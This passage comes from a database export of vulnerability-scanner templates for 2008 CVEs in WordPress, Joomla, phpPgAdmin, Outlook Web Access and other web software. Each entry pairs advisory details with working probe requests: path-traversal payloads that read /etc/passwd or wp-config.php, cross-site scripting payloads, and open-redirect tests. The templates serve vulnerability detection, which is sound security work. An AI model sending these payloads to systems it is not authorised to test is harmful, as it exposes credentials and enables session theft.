4a0a00473045022070fd863c2346a1262a1c6a87c2bf86b8a29a953f0bb6e8e24b6988aef07dcdde022100de1eb0f49138ab29c4ba04a2020fb9075ad7b3e9c9f82629d21eee375c325b40:922c64590222798bb761d5b6d8e72950", "hash": "7c1541a9a8cb2a757759573bd21562f1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e45" }, "name": "CVE-2008-1059.yaml", "content": "id: CVE-2008-1059\n\ninfo:\n name: WordPress Sniplets 1.1.2 - Local File Inclusion\n author: dhiyaneshDK\n severity: high\n description: |\n PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.\n remediation: |\n Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/5194\n - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881\n - https://nvd.nist.gov/vuln/detail/CVE-2008-1059\n - http://securityreason.com/securityalert/3706\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/40829\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2008-1059\n cwe-id: CWE-94\n epss-score: 0.01493\n epss-percentile: 0.86573\n cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress\n product: sniplets_plugin\n tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205ecbba6e0e199b46f608f16ac8f807072e05bbafa717633027622a0dda0496fe022100df4658dec4f7e3cb9a3a5a504830913ca49faea4c712f6285b50dbc2ea9d1df3:922c64590222798bb761d5b6d8e72950", "hash": "00640cbcb752ba82c7dedb3f494f6af0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e46" }, "name": "CVE-2008-1061.yaml", "content": "id: CVE-2008-1061\n\ninfo:\n name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: |\n WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/5194\n - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881\n - https://nvd.nist.gov/vuln/detail/CVE-2008-1061\n - http://securityreason.com/securityalert/3706\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/40830\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-1061\n cwe-id: CWE-79\n epss-score: 0.00663\n epss-percentile: 0.77516\n cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress\n product: sniplets_plugin\n tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Code Snippets'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950", "hash": "d483a32b1d482b688fd2b3d0eedb94b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e47" }, "name": "CVE-2008-1547.yaml", "content": "id: CVE-2008-1547\n\ninfo:\n name: Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.\n impact: |\n An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks.\n remediation: |\n Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2008-1547\n - https://www.exploit-db.com/exploits/32489\n - http://securityreason.com/securityalert/4441\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46061\n - https://github.com/tr3ss/newclei\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-1547\n cwe-id: CWE-601\n epss-score: 0.03875\n epss-percentile: 0.9108\n cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: microsoft\n product: exchange_server\n shodan-query: http.title:\"Outlook\"\n tags: cve2008,cve,redirect,owa,exchange,microsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh\"\n - \"{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0\"\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950", "hash": "1f7a590dc849062c8cf874b72d9d1cae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e48" }, "name": "CVE-2008-2398.yaml", "content": "id: CVE-2008-2398\n\ninfo:\n name: AppServ Open Project <=2.5.10 - Cross-Site Scripting\n author: unstabl3\n severity: medium\n description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor.\n reference:\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546\n - http://securityreason.com/securityalert/3896\n - https://nvd.nist.gov/vuln/detail/CVE-2008-2398\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-2398\n cwe-id: CWE-79\n epss-score: 0.00329\n epss-percentile: 0.67909\n cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: appserv_open_project\n product: appserv\n tags: cve2008,cve,xss,appserv_open_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e5f69285583054049dc882b6007c931a7249001e67d2592ec4dbab04b3e63d0b022036b288a25c5ddf0370be06576e1ee68cb3e76729998201373b7d00e187422cd6:922c64590222798bb761d5b6d8e72950", "hash": "9ee057ef44c2ad32fce2466312323793", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e49" }, "name": "CVE-2008-2650.yaml", "content": "id: CVE-2008-2650\n\ninfo:\n name: CMSimple 3.1 - Local File Inclusion\n author: pussycat0x\n severity: medium\n description: |\n CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.\n reference:\n - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17\n - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463\n - https://nvd.nist.gov/vuln/detail/CVE-2008-2650\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42792\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42793\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2008-2650\n cwe-id: CWE-22\n epss-score: 0.06344\n epss-percentile: 0.93486\n cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cmsimple\n product: cmsimple\n tags: cve,cve2008,lfi,cmsimple\n\nhttp:\n - raw:\n - |\n GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950", "hash": "2f141295d1b2d8547892581671eff074", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4a" }, "name": "CVE-2008-4668.yaml", "content": "id: CVE-2008-4668\n\ninfo:\n name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion\n author: daffainfo\n severity: critical\n description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6618\n - http://securityreason.com/securityalert/4464\n - https://nvd.nist.gov/vuln/detail/CVE-2008-4668\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/45490\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P\n cvss-score: 9\n cve-id: CVE-2008-4668\n cwe-id: CWE-22\n epss-score: 0.01018\n epss-percentile: 0.83418\n cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: com_imagebrowser\n tags: cve2008,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022063b96588b6252e04e12101a7ef9a2744b1ad191e0f2e42b4cea08a43b7e42f35022057a31c495c450ec89adc4ad386b5203ac3b15d93fe5224986eb90f9b47ca4967:922c64590222798bb761d5b6d8e72950", "hash": "ed97b9081808484f502c779b1b555565", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4b" }, "name": "CVE-2008-4764.yaml", "content": "id: CVE-2008-4764\n\ninfo:\n name: Joomla! <=2.0.0 RC2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.\n remediation: |\n Upgrade Joomla! to a version higher than 2.0.0 RC2 to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/5435\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873\n - https://nvd.nist.gov/vuln/detail/CVE-2008-4764\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-4764\n cwe-id: CWE-22\n epss-score: 0.02365\n epss-percentile: 0.89577\n cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: extplorer\n product: com_extplorer\n tags: cve,cve2008,edb,joomla,lfi,extplorer\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950", "hash": "3452ba08919d0797be1cdfd39ef453ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4c" }, "name": "CVE-2008-5587.yaml", "content": "id: CVE-2008-5587\n\ninfo:\n name: phpPgAdmin <=4.2.1 - Local File Inclusion\n author: dhiyaneshDK\n severity: medium\n description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code.\n remediation: |\n Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/7363\n - https://nvd.nist.gov/vuln/detail/CVE-2008-5587\n - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html\n - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html\n - http://securityreason.com/securityalert/4737\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-5587\n cwe-id: CWE-22\n epss-score: 0.02331\n epss-percentile: 0.88625\n cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phppgadmin\n product: phppgadmin\n shodan-query: http.title:\"phpPgAdmin\"\n tags: cve,cve2008,lfi,phppgadmin,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950", "hash": "7dce46555b1fc36009cfcbf5e5fccad4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4d" }, "name": "CVE-2008-6080.yaml", "content": "id: CVE-2008-6080\n\ninfo:\n name: Joomla! ionFiles 4.4.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6809\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6080\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46039\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-6080\n cwe-id: CWE-22\n epss-score: 0.03314\n epss-percentile: 0.90395\n cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: codecall\n product: com_ionfiles\n tags: cve,cve2008,edb,joomla,lfi,codecall\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205ae540f2d6cbc68c64570307fdf0bdf36a2b7acd80b4eee7f37e87fe1a215408022001a5e8067cb4740653e558dcafa619df1481f916f8dddb073b404630e6703a24:922c64590222798bb761d5b6d8e72950", "hash": "bf28289121868dae0979b2144f2d99e7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4e" }, "name": "CVE-2008-6172.yaml", "content": "id: CVE-2008-6172\n\ninfo:\n name: Joomla! Component RWCards 3.0.11 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Update Joomla! Component RWCards to the latest version to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6817\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6172\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46081\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2008-6172\n cwe-id: CWE-22\n epss-score: 0.00509\n epss-percentile: 0.76096\n cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: weberr\n product: rwcards\n tags: cve2008,cve,joomla,lfi,edb,weberr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950", "hash": "6ddb112e7a327b0587ad2736216fe21a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4f" }, "name": "CVE-2008-6222.yaml", "content": "id: CVE-2008-6222\n\ninfo:\n name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6980\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6222\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-6222\n cwe-id: CWE-22\n epss-score: 0.01029\n epss-percentile: 0.82175\n cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlashowroom\n product: pro_desk_support_center\n tags: cve,cve2008,joomla,lfi,edb,joomlashowroom\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a6b3c7843f9b11700d264ebe9e7d62ab4a3218e9f4b692e8ebb15b025cb36a70221008873d32a32de8df6cd215ab066f2fb7847612833f7b326d8d4cc071bbc0a043a:922c64590222798bb761d5b6d8e72950", "hash": "598bb5cf96a2abe8e2862952d7867688", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e50" }, "name": "CVE-2008-6465.yaml", "content": "id: CVE-2008-6465\n\ninfo:\n name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.\n reference:\n - http://www.xssing.com/index.php?x=3&y=65\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6465\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-6465\n cwe-id: CWE-79\n epss-score: 0.00421\n epss-percentile: 0.73765\n cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: parallels\n product: h-sphere\n shodan-query: title:\"Parallels H-Sphere\n tags: cve,cve2008,xss,parallels,h-sphere\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\\\" onfocus=alert(document.domain); autofocus'\n - 'Please enter login name & password'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950", "hash": "4925ec2c56f9294b091c39fa8f77c7cd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e51" }, "name": "CVE-2008-6668.yaml", "content": "id: CVE-2008-6668\n\ninfo:\n name: nweb2fax <=0.2.7 - Local File Inclusion\n author: geeknik\n severity: medium\n description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: |\n Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/5856\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6668\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-6668\n cwe-id: CWE-22\n epss-score: 0.00359\n epss-percentile: 0.71607\n cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dirk_bartley\n product: nweb2fax\n tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950", "hash": "3678731d4b995820b7a479ac2abf49b7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e52" }, "name": "CVE-2008-6982.yaml", "content": "id: CVE-2008-6982\n\ninfo:\n name: Devalcms 1.4a - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6369\n - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6982\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-6982\n cwe-id: CWE-79\n epss-score: 0.0038\n epss-percentile: 0.70097\n cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: devalcms\n product: devalcms\n tags: cve,cve2008,devalcms,xss,cms,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'sub menu for: '\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100930ae1e3a335eff7b78c478fd3c7f1177b65130a6d6b2b00ff6507a2c29d87900220537ba82e9274860321609d107916524e805cd669e6949ae5fce2998f92e135f9:922c64590222798bb761d5b6d8e72950", "hash": "62bbdd39c29a4f4755397c2ce8b6b9e3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e53" }, "name": "CVE-2008-7269.yaml", "content": "id: CVE-2008-7269\n\ninfo:\n name: UC Gateway Investment SiteEngine v5.0 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.\n remediation: |\n Apply the latest patches or updates provided by the vendor to fix the open redirect vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2008-7269\n - https://www.exploit-db.com/exploits/6823\n - https://github.com/tr3ss/newclei\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P\n cvss-score: 5.8\n cve-id: CVE-2008-7269\n cwe-id: CWE-20\n epss-score: 0.01425\n epss-percentile: 0.86241\n cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: boka\n product: 